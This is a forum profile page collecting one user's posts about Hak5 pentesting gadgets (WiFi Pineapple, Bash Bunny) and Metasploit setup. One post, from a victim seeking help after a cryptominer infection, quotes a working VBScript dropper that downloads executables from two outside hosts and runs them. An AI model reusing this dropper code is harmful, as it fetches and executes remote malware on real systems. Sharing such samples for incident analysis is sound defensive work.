Jump to content

jermzz

Active Members
  • Posts

    100
  • Joined

  • Last visited

Recent Profile Visitors

1,261 profile views

jermzz's Achievements

Newbie

Newbie (1/14)

  1. If you're connecting by serial then you're in arming mode which doesn't support Ethernet. Use one of the switches and set to Ethernet attack vector. Then you may run the bb.sh and ssh into your bunny. Took me a few min to figure this out as well.
  2. it's not going to work if it needs to run before and after a reboot issuing different key strokes. Especially if it needs to enter an unknown login password
  3. Cd metaspoit-framework directory. Gem install activesupport or gem install bundler bundle install
  4. Makes perfect sense. It's funny I was going through loops to do something so easy has I just thought about it logically. Guess I don't think out of the box well ? Thanks again nick.
  5. You're right. I misunderstood. I thought you were telling me to tether to my laptop. That should work, didn't even clue into that. Thanks :)
  6. I want to control the pineapple by wifi either than tether from my laptop. Only way I've found so far That works is to use macchanger to clone the mac of my wireless wlan2 with my kali box and then Disconnect / connect the pineapple
  7. You don't need the LAN turtle. Just plug the cord into your computer, then plug your pineapple into the USB port. Share internet to the pineapple, and then you should be able to connect to the management interface via wifi from your other devices. I would strongly suggest disabling your open interface, making a strong password for your management interface and changing your pineapple IP address if you're going to do this... for security reasons.
  8. I have the field kit. It's great. Although it looks like it was made for the MKV. it still works for my nano, but I'd love to see a kit, it would probably have to be marginally larger, that would fit the tetra somehow. The tactical bag isn't really realistic for me when carrying all my other things, and I've been just carrying my tetra in its box in my bag. It works for now, but this is something I'd love to see. A field kit case that carries all the current goodies plus a tetra.
  9. Anyone know a good method to authenticate the pineapple with a portal that makes you click to accept and get internet? Usually I would put my laptop on the wifi and then share internet to the pineapple, but I would like to use client mode and have the pineapple sit by itself and manage it via the management interface. thanks.
  10. Thanks man, this helped me. I couldn't get my terea working for an hour. Ended up starting it like you said, and repeatedly pounding the reset button hard like 50 times, and then the continue button finally worked. Honestly makes me wonder about quality control. I was really distraught that I was about to have to RMA my Tetra. I knew I was doing the process right, as I have a nano which wotks flawlessly now. I say now because my first one was defective, had to get replaced. Additionally, I just read that that some of the pineapple 1500's have the shut off problem..... I got my field kit and didn't use my 1500 for quite a while because I didn't need it really, and because I have a couple other Ankers that work well. Then, when i went to use it 4 (est) months later, it would just turn off when I tried to plug something in. I shrugged it off because who knows what I may have done unknowingly, and the fact that I had more usb chargers made it negligible. I've sent hak5 in total probably $1500 of my hard earned money in total, and it seems that most of my featured products have had major flaws that inhibit it's basic functionality. Replaced nano, broken pineapple juice, abusive handling for my tetra to work properly..... Hopefully at the least hak5 will replace my pineapple juice 1500. I really do like my products when I get them in working order. I'll reach out to them next week. Jeremy
  11. The VM has indeed been recreated. I'll have to ask her what VM she uses. I found this, seems to be what she may have had http://m.theinquirer.net/inquirer/news/2109599/worlds-dangerous-botnet-mines-bitcoins edit: so she was running an old version of Wordpress and MySQL. She was asking for it. Now she knows.
  12. It all started yesterday when she realized her VM, which is a Windows server 2012 r2 machine her friend hosts for her (hyper-v), was running at max load. The only real thing she hosts on it is her personal website that she sells some stuff on for fun. Anyway, upon further inspection, she saw a suspicious process taking up tons of cpu. Looked like a legit Microsoft service except it was in a tmp directory. So obviously a virus. But why? So looking deeper, a script was found in c:\ a vbs script (insert garbage here).vbs here's what was in it. Set Post = CreateObject("Msxml2.XMLHTTP") Set Shell = CreateObject("Wscript.Shell") Post.Open "GET","http://www.game918.me:2545/host.exe",0 Post.Send() Set aGet = CreateObject("ADODB.Stream") aGet.Mode = 3 aGet.Type = 1 aGet.Open() aGet.Write(Post.responseBody) afile = "host.exe" aGet.SaveToFile afile,2 Shell.Run (afile) Set Post = CreateObject("Msxml2.XMLHTTP") Set Shell = CreateObject("Wscript.Shell") Post.Open "GET","http://huya1219.top/svchost.exe",0 Post.Send() Set aGet = CreateObject("ADODB.Stream") aGet.Mode = 3 aGet.Type = 1 aGet.Open() aGet.Write(Post.responseBody) afile = "svchost.exe" aGet.SaveToFile afile,2 Shell.Run (afile) It appears it was downloading executables that were scripts and then copying them to run? Not aire what the point of that would be unless they want to be able to update the script via the web. Anyway, it turns out it scheduled a task to run hourly to run itself again. A bit coin mining service. This little bastard spidered everywhere. My question is HOW did this asshat get in? We ran netstat and found a bunch more stuff. A bunch of modified (or maybe added?) dll files in the MySQL server plugins folder. Im assuming it was some MySQL vulnerablity for arbitrary file upload? I'll post a couple pictures of the files infected. We searched for files modified on the infection date (5/1). We ended up wiping the VM and starting another. No telling what else was infected, or maybe a keylogger.... Crap this sucks. We really just want to know what needs to be patched. Hopefully someone can add some insight. http://imageshack.com/a/img924/108/gsFTxn.jpg http://imageshack.com/a/img921/2816/WCHbBN.png http://imageshack.com/a/img924/1098/2TjwUx.png
  13. If you use open VPN, you should be able to put a remote computer on the network with bettercap / whatever you want to do. That's what I do anyway. The target network will just obviously need Internet access.
×
×
  • Create New...